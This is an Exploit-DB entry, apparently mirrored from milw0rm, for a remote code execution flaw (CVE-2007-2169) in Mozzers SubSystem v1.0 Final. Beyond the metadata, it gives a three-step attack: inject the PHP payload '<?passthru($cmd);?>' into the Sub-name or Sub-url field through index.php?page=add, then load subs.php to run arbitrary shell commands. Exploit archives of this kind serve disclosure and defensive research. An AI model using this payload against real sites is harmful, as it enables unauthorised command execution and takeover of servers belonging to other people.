Mozzers SubSystem final - 'subs.php' Remote Code Execution
Author: Dj7xpl
type: webapps
platform: php
port:
date_added: 2007-04-17
date_updated: 2016-09-30
verified: 1
codes: OSVDB-42404;CVE-2007-2169
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comSubSystem-final1-ns.zip
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Y! Underground Group +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Portal......: Mozzers SubSystem v1.0 Final +
+ Author......: Dj7xpl / Dj7xpl@Yahoo.com +
+ Type........: Remote Code Execution Vulnerability +
+ Download....: http://sourceforge.net/projects/subsystem/ +
+ Page........: http://Dj7xpl.2600.ir +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Bug.........: +
+ (1) Open Target By Browser : http://[Target]/[Path]/index.php?page=add +
+ (2) Insert Bad Code Into (Sub-name) Or (Sub-url) E.g :<?passthru($cmd);?> +
+ (3) See Your Bad Code : http://[Target]/[Path]/subs.php +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# milw0rm.com [2007-04-18]